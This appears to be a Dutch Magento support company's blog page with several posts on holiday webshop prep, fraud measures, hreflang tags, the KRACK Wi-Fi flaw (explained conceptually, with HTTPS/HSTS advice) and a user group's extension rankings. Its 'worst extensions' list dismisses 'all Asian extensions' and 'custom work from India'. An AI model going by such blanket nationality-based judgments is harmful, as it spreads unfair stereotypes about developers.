    Mats van de SeijpDit artikel is geschreven door Mats van de Seijp, onze spin in het web als Support, Ticket Manager, Business Intelligence analyst en Blogger.

    LinkedIn

  • Black Friday, Cyber Monday en Kerst: 5 tips om jouw Magento webshop voor te bereiden op de decemberdrukte

    Black Friday-Cyber-Monday- KerstMet Black Friday op vrijdag 24 november en Cyber Monday op de 27 november is dit voor veel Magento webshops het begin van de drukste 5 weken van het jaar. Al die feestdagen die extra koopkracht stimuleren is natuurlijk geweldig maar brengt ook de nodige voorbereiding met zich mee. Om ervoor te zorgen dat jij en jouw Magento shop klaar zijn voor de drukte, hebben wij een checklist voor jou gemaakt met handige tips zodat je goed voorbereid de feestdagen tegemoet gaat.

    Black Friday, Cyber Monday, Sinterklaas, Kerst: Waar moet ik op letten?

    Black Friday is de dag na Thanksgiving en is de officieuze start van het Amerikaanse winkelseizoen in de aanloop naar kerst. Deze dag staat bekend om de extreem hoge kortingen, drukke winkels en taferelen als twee vrouwen die in volle macht aan de hengsels van die laatste 70% afgeprijsde Michael Kors tas trekken.
    Cyber Monday is de E-commerce variant van Black Friday en is de afgelopen tien jaar steeds groter geworden. Met een groei van 15 a’ 20% per jaar en een slordige 2,2 miljard aan geschatte verkopen voor 2017, is dit een serieuze dag om als webwinkelier op in te spelen. Black Friday en Cyber Monday speelt zich al lang niet meer exclusief af in Amerika. Grote (web) winkels als de Bijenkorf, Bol.com en de Mediamarkt stunten al jaren met hoge kortingen op deze dagen. Coolblue heeft dit jaar zelfs zijn eigen dag (Blue Friday) toegevoegd, de week voor Black Friday. Alles om maar een deel te krijgen van het kerstbudget van de consument.

    Wat kun jij ter voorbereiding doen voor de decemberdrukte?

    Het draait allemaal om voorbereiding. Om optimaal te kunnen profiteren moeten alle processen in je Magento webshop vlekkeloos verlopen. Dit betekent dus een uitgedachte marketingstrategie, voldoende voorraad maar ook alle technische aspecten van je webshop. Een super originele reclamespot afspelen tijdens de break van RTL late Night trekt veel bezoekers, maar die kopen niks als je pagina’s pas na 8 seconden laden. Daarom hier een lijst met tips om jou goed voorbereid de online shopping gekte in te sturen:

    • Marketing
    • Magento Performance
    • Magento Hosting
    • Magento Security
    • Alles even nalopen

    SupprtDesk tip 1. Marketing

    Een voordeel, tijdens deze dagen zijn mensen al van plan geld uit te geven. Echter, er wordt flink gestunt met prijzen en iedereen wilt een stuk van het kerstbudget van de consument. Met een goed uitgekiende marketingstrategie zorg jij ervoor dat consumenten bij jou gaan shoppen. Probeer met de vormgeving van je marketingplan rekening te houden met, onder andere, de volgende vragen:

    • Doel
    • Budget
    • Klanten
    • Kanalen
    • Producten
    • Verzenden & retourneren

    Doel. Het begint allemaal met het doel van de strategie. Wat wil jij bereiken met je marketingacties? Dit gaat doorgaans verder dan een zo hoog mogelijke omzet genereren tijdens de feestdagen. Waar staat jouw organisatie voor?, een bepaalde beleving voor de klant, dat ene beetje extra service waardoor ze niet alleen nu maar ook volgend jaar bij jou blijven shoppen.

    Budget. Wat is mijn marketingbudget? Hoeveel geld heb ik te besteden om mijn marketingplan te realiseren? Denk hierbij niet alleen aan de kosten van die gave reclame op RTL Late Night en e-mail campagnes; ook de kosten om jouw Magento webshop klaar te stomen voor deze drukke dagen horen hierbij.

    Klanten. Wie zijn mijn klanten? Hoe beter je in kaart krijgt wie jouw klanten zijn hoe beter je marketingacties aankomen. Maak je budget niet op door met (online) hagel te schieten en zoveel mogelijk mensen te bereiken. Door eerst in kaart te brengen wie je klanten zijn, waar ze vandaan komen en wat ze triggert tot koopgedrag, bereik je veel meer met je budget.

    Kanalen. Welke kanalen zet ik in om mijn (potentiele) klanten te bereiken? Die gave reclame tijdens RTL Late Night is al een paar keer gevallen maar er zijn natuurlijk veel meer mogelijkheden. Kijk eens goed naar social media kanalen als Facebook, Instagram, Twitter, LinkedIn maar ook naar Google adwords, Google Shopping, Youtube, Email campagnes en radio.

    Producten. Wat biedt ik mijn klanten aan tijdens de kerstdagen? Consumenten hebben de neiging rond de feestdagen wat luxer te shoppen. Kijk daarom goed naar je voorraad. Zijn en er van bepaalde producten luxe edities beschikbaar die in smaak vallen? Is er behoefte aan een mooie kerstcadeauverpakkingen? Hoeveel voorraad heb ik nodig? Zorg ervoor dat klanten die dat beetje extra luxe en gemak zoeken, dit kunnen vinden in jouw webshop.

    Verzenden en retourneren. Vandaag besteld morgen in huis. Hier maak je al veel vrienden mee, vooral die last minute shoppers die een cadeautje voor hun schoonmoeder zijn vergeten te kopen. Een snel en helder verzendproces geeft je hierdoor veel credits bij de consument. Een nette bevestigingsmail, een track & trace code, snelle levering, en een bericht wanneer het pakketje geleverd is neemt veel stress weg bij de klant, je kunt je immers niet permitteren met lege handen aan te komen bij je schoonmoeder.

    Als je toch bezig bent neem dan ook meteen het retourneerproces onder loep. Mensen kopen wel meer maar er worden ook meer bestellingen geretourneerd. Je herkent het wel, je hebt tijdens de kerst cadeaus van je hele familie gekregen en opeens zit je met 7 messensets. Hoe fijn zou jij het vinden dat jij 6 messensets makkelijk kunt terugsturen en snel kunt omruilen voor dat ene cadeau waar je stiekem op hoopte? FIFA 2018? Daarom, zorg dat je retourneerproces goed is ingesteld op dit soort taferelen, dit heeft een grote positieve invloed op de terugkeer van je klanten.

    Je bent al halverwege! je weet tot in detail hoe jij dat kerstbudget van de consumenten kunt verzilveren komende maand. Nu is het zaak jouw Magento webshop hiervoor klaar te stomen.

    SupportDesk tip 2. Magento Performance

    Een snelle en goed werkende webshop verhoogt de conversie, kijk daarom goed naar de prestaties van je webshop. Een handig tooltje hiervoor is de Open Source toolMage.Coach., dit is een performance tool voor Magento shops. Deze tool kijkt of je (onder andere) niet te grote afbeeldingen gebruikt, teveel javascipts hebt, je server snel genoeg reageert (first time to byte) en nog veel meer.

    SupportDesk tip 3. Hosting & Load testen

    Een snelle webshop is een goede start maar kan deze tijdens piekdrukte het online shopgeweld ook aan? Houdt er rekening mee dat het bezoek op je webshop flink kan toenemen in deze maand en dat dit effect heeft op je server. Wat je hier kunt doen is een Load test uitvoeren. Met een Loadtest simuleer je een x aantal gebruikers op je webshop waardoor je kunt zien of je webshop dit aankan. Merk je dat prestaties achteruit gaan als er 1000 gebruikers tegelijk rondneuzen op je shop maar verwacht je er tijdens Cyber Monday rond de 2000? Dan weet je dat je extra hostingcapaciteit nodig hebt.

    SupportDesk tip 4. Magento Security

    Veiligheid is natuurlijk altijd een belangrijk aspect maar dit is een goed moment om alles extra te checken of je bij bent met alle security patches en andere veiligheidsaspecten. Check MageReport om snel inzicht te krijgen in de security van je Magento webshop. Deze tool laat goed zien welke veiligheidsaspecten (snel) aandacht verdienen.

    SupportDesk tip 5. Alles even nalopen

    Je marketingstrategie staat klaar om al die klanten binnen te trekken en je webshop is voorbereid om alles soepel te laten verlopen. Nu is het tijd om nog wat standaard dingen na te lopen. Denk hierbij aan je instellingen voor Google Tag Manager, Google Analytics, Ad Words en andere dingen waar jij of klanten eventueel over kunnen struikelen.
    Zie dit stiekem maar als tip nr 6 want we willen je ook nog meegeven goed op jezelf te letten. Deze maand brengt misschien wel een recordomzet mee maar gaat ook vaak gepaard ook een stuk meer werkuren. Met onze checklist hopen wij je een in ieder geval al wat stress te ontnemen.

    Mocht onze checklist toch teveel werk blijken, heb je vragen of  Magento Support nodig? Neem gerust contact met ons op.

    meer info   of   

    Bel nu! 020 337 5961

    Mats van de SeijpDit artikel is geschreven door Mats van de Seijp, onze spin in het web als Support, Ticket Manager, Business Intelligence analyst en Blogger.

    LinkedIn

  • Justitie en betaaldiensten werken samen tegen malafide webshops

    Betaaldiensten en politie vs malafide webshopsElk jaar zijn er in Nederland tienduizenden mensen de dupe van internetoplichtingen. Deze fraudezaken spreiden zich over platformen als marktplaats en facebookgroepen maar komen ook veel voor op malafide webshops. Justitie en betaaldiensten slaan hierom de handen ineen in de strijd tegen malafide webshops. Waar komt dit precies vandaan, wat gaat er nu precies gebeuren en wat zijn de effecten voor de “ niet-malafide” (Magento) webshops?

    Waar komt dit precies vandaan?

    Met meer dan 45.000 meldingen van internetoplichtingen per jaar heeft de politie niet de tijd deze allemaal te onderzoeken. Ter beeldvorming, vorig jaar heeft de politie 35 zaken opgelost m.b.t. malafide webshops. De meldingen die werden opgepakt konden voorheen onder andere worden opgelost door een samenwerking tussen de politie, marktplaats en banken. Bij malafide particulieren en websites (bedrijven) werden dan hun accounts en/of bankrekeningen geblokkeerd.

    Met de komst van Payment Service Providers (PSP’s) is het echter lastiger geworden om malafide webshops aan te pakken. Payment Service Providers maken het mogelijk dat webwinkels meerdere betalingsmogelijkheden kunnen aanbieden (iDEAL, Visa, Mastercard, Afterpay, PayPal), terwijl dit via één leverancier komt, de Payment Service Provider. Veel kleine webshops maken hier gebruik van echter, zitten in deze groep ook de meeste malafide webshops.

    De due diligence (checken van KVK nr, bezoekadres, registratie als fraudeur) komt nu bij de tussenpersoon te liggen, de Payment service provider. Op zich geen probleem maar, bij overname van een goedgekeurde shop konden kwaadwillende alsnog hun slag slaan en er een “ malafide” shop van maken. Door deze ontwikkelingen heeft de politie nu ook de handen ineen geslagen met betaaldiensten.

    Wat gaat er nu gebeuren?

    Twaalf betalingsverwerkers hebben zich al aangesloten bij de kruistocht tegen malafide webshops. Hier zitten Payment Service Providers tussen maar ook betalingsverwerkers als iDEAL en Acceptgiro. Het idee is dat wanneer de politie drie fraude aangiftes heeft ontvangen, zij de naam van de malafide website doorsturen naar betaaldienstverleners. De betaaldienstverlener kan dan vervolgens zelf beslissen, na intern onderzoek, om alle transacties te blokkeren. Als de Payment Service Provider deze aansluiting blokkeert betekent dit dat (meestal) alle betalingsmogelijkheden van de malafide webshop geblokkeerd zijn. Alle soorten betalingsopties lopen namelijk via deze leverancier en zo wordt de malafide webshop gedwarsboomt.

    Misbruik met de nieuwe aanpak?

    Een paar boze klanten, een lastige concurrent en met drie aangiftes heb ik plots geen betaalmogelijkheden meer op mijn webshop? Een van de vele vragen die deze week bij ons de revue passeerden, en terecht. Hoewel enthousiast gereageerd wordt op de grote schoonmaakbeurt in de Nederlandse E-commerce wereld, zijn veel webwinkeleigenaren bang dat ze de dupe worden van de maatregelen.

    Zowel de politie als betalingsverwerkers geven aan hier rekening mee te houden. De politie zal eerst naar de betrouwbaarheid kijken van de aangifte alvorens deze door te sturen. De betalingsverwerkers geven ook aan eerst een intern onderzoek te doen alvorens over te gaan tot actie. Zo kijken ze weer of het bedrijf ingeschreven staat bij het KvK, naar de aard van de aangifte en naar de historie van de betreffende webshop. Met deze maatregelen moet voorkomen worden dat kwaadwillende consumenten en bedrijven de nieuwe aanpak misbruiken om webwinkels te saboteren.

    Wat betekent dit voor Magento webshops in de Nederlandse E-commerce markt?

    Voor de Nederlandse E-commerce markt zal de nieuwe aanpak goed zijn voor het vertrouwen van de consument. Afgelopen jaar zijn meerdere onderzoeken uitgekomen met de conclusie dat het vertrouwen van de consument in de E-commerce markt blijft dalen. Malafide webshops, met gezamenlijk tig duizenden fraudes per jaar, spelen hierin een grote rol. Immers, consumenten die bedrogen zijn met een online aankoop zullen dit in de (nabije) toekomst minder snel nogmaals doen.

    Wat betekent dit voor mijn Magento webshop?

    Met de maatregelen die gebruikt worden om misbruik tegen te gaan, en het hopelijk toenemende vertrouwen bij consumenten, lijkt het er op dat de nieuwe aanpak alleen maar positief is voor jouw Magento webshop, en die van de rest van Nederland. Toch willen we onze Magento klanten benadrukken goed te kijken naar hun klantproces. Van het moment dat ze jouw webshop binnenkomen, tot bestelling en erna. Kamp je momenteel met een probleem omtrent de beloofde leveringstijden of voorraden? Meld dit netjes. Hiermee geef je kwaadwillende geen kans om misbruik te maken van de nieuwe schoonmaak aanpak in de E-commerce markt.

    Magento support nodig voor een optimaal klantproces of andere Magento gerelateerde vraagstukken? Neem gerust contact met ons op.

    meer info   of   

    Bel nu! 020 337 5961

    Mats van de SeijpDit artikel is geschreven door Mats van de Seijp, onze spin in het web als Support, Ticket Manager, Business Intelligence analyst en Blogger.

    LinkedIn

  • De Hreflang tag voor jouw Magento shop

    Hreflang tags voor Magento shopsStel, Je hebt een goedlopende Magento shop maar merkt dat Nederland niet meer groot genoeg voor jou is. Met jouw internationale ambities wil jij jouw shop ook bekend maken bij de rest van de wereld. Jij wilt de inhoud van je webshop graag in meerdere talen aanbieden om jouw internationale klanten het beste te kunnen bedienen, maar je geen zorgen willen maken over iets als duplicate content. Hoe?...De Hreflang tag biedt de oplossing!

    Wat is de Hreflang tag?

    De Hreflang tag maakt zoekmachines duidelijk dat bepaalde pagina’s voor bepaalde doelgroepen bedoeld zijn. Deze doelgroepen kun je onderverdelen in landen, talen of zelfs land-specifieke talen. Aan de hand van het onderstaand scenario proberen wij dit voor je te verhelderen.

    Waarom de Hreflang tag?

    Stel, je hebt besloten dat jouw bedrijf zich ook op de Franse markt gaat richten en hiervoor heb jij je Magento shop naar het Frans laten vertalen. Dit kan overigens je hele webshop zijn maar ook alleen de pagina’s die jij essentieel vindt voor jouw Franstalige klanten (bijvoorbeeld je homepage, productpagina’s en checkout, maar bijvoorbeeld niet de pagina met blogs). Je hebt nu dus meerdere (of alle) pagina’s die zowel in het Nederlands als in het Frans aangeboden kunnen worden.

    Je kunt er vanuit gaan dat jouw Nederlandse pagina’s waarschijnlijk minder gewaardeerd zullen worden door iemand uit Frankrijk, omdat deze bijna niks van de inhoud zal snappen, Je ne comprends pas. Je wilt de beste Fransman dus graag naar jouw Franstalige pagina doorverwijzen maar ook de stap ervoor, dat de zoekmachine de Franstalige resultaten laat zien van de desbetreffende pagina. Hoe een zoekmachine precies weet wie bij welke doelgroep hoort gaan we nu niet op in. Het belangrijkste om te weten is dat de Hreflang tag hier zijn werk doet.

    Wat doet de Hreflang tag?

    De Hreflang tag zal een zoekmachine signaleren, laten we Google zeggen want wie gebruikt dat nou niet, dat bepaalde pagina’s zowel in het Nederlands als Frans aanwezig zijn. Ook zal de Hreflang tag Google vertellen welk van de twee pagina’s te laten zien in de zoekresultaten en naar welke pagina de klant door te sturen, afhankelijk van de doelgroep die er naar kijkt. Hoe Google precies concludeer. Wanneer Google denkt dat de zoeker een Franstalige is zal de Franse pagina naar voren komen in plaats van de Nederlandse.

    Hreflang tags: Doelgroepen, landen, talen en land-specifieke talen

    Onlangs heb je ook besloten België maar mee te nemen in je internationale veroveringsplan. Immers, je kunt het land onderverdelen in een Frans en-Nederlandstalig gedeelte (Wallonië en Vlaanderen). Dat is dus een extra land erbij zonder extra vertalingen (dit geldt natuurlijk ook voor andere landen waar Frans gesproken wordt). We gaan er nu vanuit dat de Nederlandse schrijfstijlen en woordkeuzes verder geen invloed hebben op de Belgische markt, dit is puur als voorbeeld.

    We willen nu dus een Franstalige pagina voor Frankrijk maar ook voor het Franstalig gedeelte in België (Wallonië). Verder willen we een Nederlandse pagina voor Nederland en voor het Belgisch sprekend gedeelte in België (Vlaanderen). In andere woorden, we willen een Franse pagina voor een specifiek land (Frankrijk) en, een Franse en Nederlandse pagina voor België, afhankelijk van de regio (Land-specifieke talen, per regio). Hieronder zie hoe je dit soort wensen middels de hreflang tag kunt aangeven aan zoekmachines:

    • NL - Nederland ongeacht het land
    • Nl-nl -Nederlands enkel in Nederland
    • NL-BE -Nederlands in België (nog specifieker in Nederlands sprekend gedeelte Vlaanderen)
    • FR-BE - Frans in België (in Franssprekend gebied Wallonië)
    • FR-FR - Frans in Frankrijk

    De taalcode van Hreflang tag is opgezet volgens het ISO 639-1 systeem. Het overzicht van de lettercodes voor de talen vindt je hier.

    Hreflang tags en duplicate content

    Een ander voordeel is dat de Hreflang tag helpt tegen duplicate content. Dupliate content is hetzelfde of erg overeenkomende content op webpagina’s. Zoekmachines zien pagina’s met dezelfde inhoud als minder waardevol en zullen dus lager in de zoekresultaten komen. Jouw pagina’s zijn in meervoud aanwezig (NL, FR). Hoewel de talen per pagina verschillen zal de inhoud redelijkerwijs hetzelfde zijn en kunnen zoekmachines dit als duplicate content zien. Je gebruikt de Hreflangt tag om de relatie tussen die twee pagina’s aan te geven. Hiermee geef je de zoekmachine het signaal dat de inhoud van de pagina’s overeenkomen maar dat dit komt omdat deze zich richten op verschillende doelgroepen.

    Google Search Console en de Hreflang tag

    Werk je met Hreflang tags gebruik dan eens Google Search Console. Dit is een gratis dient van Google waarmee je als eigenaar/beheerder, onder andere, de indexering en kwaliteit van jouw website kan evalueren. De Google Search Console helpt jou dus ook met de Hreflang tag. Deze doet als het ware een kwaliteitscheck van jouw webshop (Staan alle Hreflang tags wel op je juiste plaats?). Hierin is in een oogopslag te zien of de tags goed geïmplementeerd zijn.

    De Hreflang tag conslusie

    Als je internationale ambities hebt is de Hreflang tag zeker iets om over na te denken. Het biedt voordelen op SEO vlak maar vooral en de kans om de content van je Magento shop beter af te stemmen op verschillende doelgroepen. Een webshop die beter aansluit op je doelgroep resulteert in meer mensen die doorklikken, een lagere bouncerate en een hogere conversie. Het kost even tijd om de pagina’s te vertalen en de codes op te maken maar de voordelen maken dit meer dan goed.

    SupportDesk heeft ook zelf een Hreflang tag module ontwikkeld en is te gebruiken voor Magento 1 & Magento 2 shops! Deze module biedt veel extra functionaliteiten en is al succesvol geimplementeerd bij meerdere van onze klanten. Wilt u meer weten over wat de Hreflang tag voor uw Magento shop kan betekenen, of heeft u hulp nodig met het implementeren ervan? Neem gerust contact met ons op.

    meer info   of   

    Bel nu! 020 337 5961

    Mats van de SeijpDit artikel is geschreven door Mats van de Seijp, onze spin in het web als Support, Ticket Manager, Business Intelligence analyst en Blogger.

    LinkedIn

  • Training: Versiebeheer met Git

    Git VersiebeheerVrijdag 3 november wordt een training “Versiebeheer met Git” georganiseerd door Byte. Tijdens deze training leer je in één dag alle basics die je moet weten om effectief Git in te zetten voor gedegen versiebeheer. De training wordt gegeven door Rachel Tjong-A-Hung, onze Git specialist van SupportDesk. Tijdens de training zullen de volgende aspecten aan de orde komen:

    • Wat is versiebeheer? (i.e. GIT vs SVN)
    • Waarom GIT?
    • Messages and commits
    • Meest gebruikte commando's GIT
    • Tips and Tricks (o.a. Git omgeving opzetten voor grote projecten, samenwerken middels Git, het opzetten van een verbinding tussen Gitlab en een website die elders gehost staat)
    • Bad practices

    Dus wil je graag effectief met Git leren werken of heb je al wat basiservaring maar kan je versiebeheer nog een opfrisser gebruiken? Dan is de training "Versiebeheer met Git" zeker wat voor jou.

    Doelgroep: Beginner+ : basiservaring met Git
    Datum: Vrijdag 3 november 2017 | 9:30 - 17:30 uur
    Locatie: Byte HQ (Amsterdam, Westerpark)
    Kosten: €250,- excl BTW. Inclusief koffie/thee/fris/lunch en een welverdiend biertje na afloop
    Opgeven:Aanmelden kan via events [at] byte.nl

    Magento en Git training

    Kunt u deze training niet bijwonen maar wilt u ook meer weten over hoe Git ingezet kan worden voor versiebeheer van uw Magento shop? Neem gerust contact met ons op.

    meer info   of   

    Bel nu! 020 337 5961

    Mats van de SeijpDit artikel is geschreven door Mats van de Seijp, onze spin in het web als Support, Ticket Manager, Business Intelligence analyst en Blogger.

    LinkedIn

  • SupportDesk blijft groeien en is een FD Gazelle 2017

    SupportDesk is een 2017 FD Gazelle Met trots kunnen wij melden dat SupportDesk B.V. behoort tot één van de snelst groeiende bedrijven van Nederland. In november mogen wij dan ook de FD Gazellen 2017 in ontvangst nemen.

    Totaal zijn er 754 ondernemingen die in 2017 de FD Gazellen Award in ontvangst hebben mogen nemen. Om hier kans op te maken moesten bedrijven in de afgelopen die jaar ten minste 20% in omzet zijn gegroeid en het laatste jaar winstgevend hebben afgesloten. Dit jaar was de eerste keer dat wij meededen en om meteen bij deze prestigieuze club van snelgroeiers te horen is natuurlijk fantastisch.

    Wij zijn er daarom ontzettend trots op dat wij dit dankzij het vertrouwen van onze opdrachtgevers en ons enthousiaste team hebben bereikt.

    SupportDesk zal aankomend jaar hard aan de weg blijven timmeren om ook in 2018 een Gazelle te zijn.

    meer info   of   

    Bel nu! 020 337 5961

    Mats van de SeijpDit artikel is geschreven door Mats van de Seijp, onze spin in het web als Support, Ticket Manager, Business Intelligence analyst en Blogger.

    LinkedIn

  • Impact Wi-Fi Krack voor Magento shops

    impact wi-fi krack on Magento webshopWi-Fi Krack, wat is er gebeurd?

    Afgelopen maandag kwam het bericht naar buiten dat er een kwetsbaarheid was gevonden in onder meer WPA en WPA2. Mathy Vanhoef, en andere onderzoekers van de KU Leuven, kwamen met dit onderzoek naar buiten. De kwetsbaarheid draagt de naam “Krack”, wat staat voor “ Key Reinstallation Attack”. De aanval is voornamelijk gericht op draadloze clients en vormt een risico voor alle moderne wifinetwerken.

    WEP, WPA, WP2? Hoe zat dat ook alweer?

    De Wi-Fi Alliance is een non-profit organisatie die zich bezig houdt met Wi-Fi technologie en het certificeren van Wi-Fi producten. Deze organisatie heeft WPA in het leven geroepen nadat gebleken is dat zijn voorganger WEP (Wired Equivalent Privacy) niet meer geschikt was om netwerken te beveiligen. WPA (Wi-Fi Protected Accesss) werd in 2003 geïntroduceerd maar werd in 2006 al vervangen voor de vernieuwede versie WPA 2. Wi-Fi Alliance stelde WPA2 verplicht voor hun gecertificeerde producten en WPA2 maakte hierdoor een grote opmars. Dit resulteert dat vandaag de dag 68,02% van de Wi-Fi hotspots WPA2 gebruikt, 7,37% WPA, 2,66% WEP en 21,96% open is.

    Wat is het probleem precies?

    WPA2 maakt gebruikt van een zogenaamde "4-way handshake". Deze handdruk zorgt ervoor dat de cliënt (jij) en access point (Wi-Fi punt), onderlinge authenticatie uitvoeren en een sessiesleutel overeenkomen. Hiermee wordt, mits alle correct verloopt, een beveiligde en versleutelde verbinding tot stand gebracht. Voor uitleg over de 4-way handshake, en wat de kwetsbaarheid is, wordt je doodgegooid met termen als Pairwise Master Key, Pairwise Temporal Key, Anonce en Snonce. Dit maakt de boel echter niet veel helderder. Het belangrijkste om te weten is dat het proces 4 stappen heeft en dat het probleem bij stap 3 plaatsvindt. Hieronder een hopelijk verhelderende uitleg.

    Jij wilt verbinding maken met een draadloos netwerk maar dit moet natuurlijk een beveiligde verbinding zijn waarbij beide partijen (bijvoorbeeld jou laptop en Wi-Fi punt) moeten weten dat ze daadwerkelijk met elkaar communiceren.

    • 1. Het access point (Wi-Fi punt) stuurt de cliënt, bijvoorbeeld jouw laptop, informatie toe waarmee een tijdelijke sleutel (PTK, pairwise temporal key) gegenereerd kan worden.
    • 2. De cliënt stuurt vervolgens de gegenereerde PTK, plus andere authenticaties, terug naar het accespoint. Er heeft authenticatie plaatsgevonden en is een sleutel gegenereerd.
    • 3. Het accespoint stuurt vervolgens een sessiesleutel naar de cliënt. Deze sessiesleutel versleuteld de informatie die verstuurd wordt tussen de cliënt en het access point.
    • 4. De cliënt confirmeert vervolgens aan het accespoint dat de sleutel geïnstalleerd is en een beveiligde verbinding is tot stand gekomen.

    Indien de cliënt niet confirmeert dat de sleutel sessiesleutel ontvangen is, wordt stap drie herhaald en stuurt het access point de sessiesleutel opnieuw. Vanhoef maakt hier gebruik van door het derde bericht op te onderscheppen en deze steeds opnieuw te verzenden. De cliënt installeert hierdoor steeds de nieuwe sleutel en gebruikt telkens hetzelfde pakketnummer, welke informatie bezit. Dit geeft een aanvaller de mogelijkheid deze informatie te ontcijferen of zelfs te manipuleren.

    Wat is de impact op mijn Magento shop?

    In principe kan een kwaadwillende dus bij jou of jouw klant zijn/haar gegevens wanneer gebruik wordt gemaakt van Wi-Fi. Dit is echter deels waar. De impact voor u en uw klanten is afhankelijk van de gebruikte encryptie op uw Magento shop. Verstuurt een gebruiker bijvoorbeeld wachtwoorden, cookies, creditcardgegevens of andere gevoelige gegevens via http, wat onbeveiligd is, heeft de aanvaller in een mum van tijd deze gegevens. Gebruikt jouw Magento shop echter https (HTTP over SSL), dan is het netwerkverkeer alsnog versleuteld en (bijna) onmogelijk in te zien voor de aanvaller. Dit geldt overigens ook wanneer VPN wordt gebruikt.

    Nu heeft jouw Magento shop wellicht al een SSL certificaat en https maar dit volstaat helaas niet. Om te zorgen dat al het netwerkverkeer altijd versleuteld is dient jou SSLHardened” te zijn. Dit vergt enige configuraties in de SSL, met name de opzet van HSTS.
    HSTS (HTTP Strict Transport Security) is een set aan beveiligingsmechanismes die ervoor zorgen dat webservers eisen dat een webbrowser alleen maar werkt via een HTTPS connectie. Dit voorkomt mogelijke “protocol downgrade attacks” die alsnog data, nu mogelijk te ontcijferen, via http kunnen versturen.

    Wat moet ik doen om mijn Magento shop veilig te maken?

    SupportDesk raad haar klanten goed te kijken of hun SSL op orde is en HSTS aan te zetten. Dit zorgt ervoor dat klantgegevens op uw Magento shop versleuteld zijn en niet gejat kunnen worden, ook al is de gebruikte Wi-Fi verbinding gehackt. Wij raden nogmaals dringend aan om dit advies op te volgen.

    Op dit moment is SupportDesk voor meerdere klanten bezig een security check te doen, SSL certificaten na te lopen en HSTS op te zetten. Mocht u problemen ondervinden met het opzetten van de bovenstaande beveiligingsadviezen, wij helpen u graag.

    meer info   of   

    Bel nu! 020 337 5961

    Mats van de SeijpDit artikel is geschreven door Mats van de Seijp, onze spin in het web als Support, Ticket Manager, Business Intelligence analyst en Blogger.

    LinkedIn

  • MUG: Top 10 Magento 2 Extensies 2017

    MUG: Top 10 Magento 2 extensies-10-2017Afgelopen Donderdag, 12 oktober 2017, heeft de Magento User Group Amsterdam voor de eerste keer een Top 10 verkiezing gedaan van de beste Magento 2 Extensies.

    Er zijn van te voren zijn een tal van extensies ingediend, welke verder zijn aangevuld door de aanwezige MUG-ers. Meer dan 50 extensies passeerden deze avond de revue en werden uitgebreid besproken en beoordeeld. Om de waslijst aan extensie overzichtelijk te houden zijn deze onderverdeeld in 7 categorieën:

    • Magento 2 Marketing Extensions
    • Magento 2 Backend Extensions
    • Magento 2 Frontend Extensions
    • Magento 2 Performance Extensions
    • Magento 2 Security Extensions
    • Magento 2 Dev tools Extensions
    • Worst Magento 2 Extensions

    De volgende extensies bleken populair bij Magento webwinkel eigenaren en ontwikkelaars.

    Magento 2 Marketing Extensions

    1. Yoast SEO [MaxServ] MUG: Top 10 Magento 2 extensies-10-2017
    2. Bluefoot [Bluefoot]
    3. SEO Suite [Mageworx]
    4. MailChimp [MailChimp]
    5. AW blog [Ahead Works]
    6. Google Tag Manager [SupportDesk]
    7. Channable [magmodules]
    8. SOOQR [MagModules]
    9. Rich Snippit [SupportDesk]
    10. Datafeed manager [wyomind]

    Magento 2 Backend Extensions

    1. Buckaroo [TIG] MUG: Top 10 Magento 2 extensies-10-2017
    2. Mollie Payment [magmodules]
    3. Order Export [Xentento]
    4. PDf Customiser [Fooman]
    5. Xcore [D4D]
    6. Exact Globe [D4D]
    7. PostNL [TIG] & [CREAM]
    8. Mamut [Flows]
    9. Odoo [Magenest]
    10. Remote SMPT [Xtento]
    11. Stripe [MageDelight]
    12. MultiSafePay [MSP]

    Magento 2 Frontend Extensions

    1. Ultimo[Ultimo]
    2. Accelerated Mobile Pages [Plumbrocket]
    3. Href Lang Tag [SupportDesk]
    4. Sphinx Search [Mirasvit]
    5. Cart2Quote [Cart2Quote]
    6. Mobile Performance [SupportDesk]
    7. Elastic Search [Bubbleshop]
    8. Improved Layered Navigation [Amasty]
    9. AJAX Cart [Amasty]
    10. OneStepCheckout [OSC]
    11. SnowDog[SnowDog]

    Magento 2 Performance Extensions

    1. Section.IOMUG: Top 10 Magento 2 extensies-10-2017
    2. Mage.Coach
    3. Fastly
    4. Tiny Png

    Magento 2 Security Extensions

    1. MageReport[Byte]
    2. 2FA [Xtento]
    3. Admin Action Log [Amasty]
    4. TrustGuard [B2U]
    5. Weak Password Finder [Thycotic]

    Magento 2 Development Tools

    1. Marketplace Extension Quality Program [MEQP]
    2. Email Tester [Yireo]
    3. Magento Module Manager [MTA]
    4. Content Staging Flow
    5. N98[magerun]

    Worst Magento 2 Extensions

    Ook deze keer hebben we een categorie toegewijd aan de extensies en tools waar we met een grote boog omheen moeten lopen. En ook deze keer, net zoals bij de voorgaandetop 10 Magento 1 extensies, zitten hier weer een paar usual suspects tussen. Let op, de hieronder benoemde extensies en tools zijn opgeschreven op basis van persoonlijke ervaringen en zouden bij andere partijen wel als positief ervaren kunnen worden.

    1. Alle aziatische extensies
    2. Maatwerk uit India
    3. M2 Composer
    4. Magmi
    5. Veel Amasty extensies
    6. MW blog

    Magento 2 top 10 extensions

    De bovenstaande categorieën geven al een behoorlijk beeld over de hoeveelheid Magento 2 extensies die een positieve ervaring hebben genoten. Hartstikke goed dat er zoveel goede Magento 2 extensies bij zijn gekomen maar aan het einde van de MUG is er nog wel een stemronde geweest. Hierin hebben alle aanwezige MUG-ers per categorie één, of meerdere, extensie(s) gekozen als favoriet. Gebleken is dat een aantal extensies de voorkeur genoten van de meerderheid en deze willen wij dan nog even extra in het zonnetje zetten.

    N-98

    Ook al erg populair geweest in de MUG: top 10 Magento extensies, is N-98 in de Magento 2 editie ook al de meest populaire Development tool. N-98 staat ook wel bekend als het Zwitsers zakmes voor Magento developers. Je kunt er legio dingen mee configureren, zoals databases synchroniseren, gebruikers aanmaken enz. Voor deze tool is kennis van Shell wel vereist en het is het voor het eerste gebruik aan te raden om op een testomgeving te werken met N-98.

    Buckaroo

    Buckaroo is een Nederlandse Payment Service Provider (PSP). Al 4 jaar op rij uitgeroepen tot Beste Payment Provider van Nederland maakt Buckaroo dit imago ook waar voor Magento 2. De Buckaroo extensie [TIG] voor Magento 2 shops werd ervaren als gebruiksvriendelijk en uitgebreid op het gebied van betalingsmethoden.

    2FA “Two Factor Authentication”

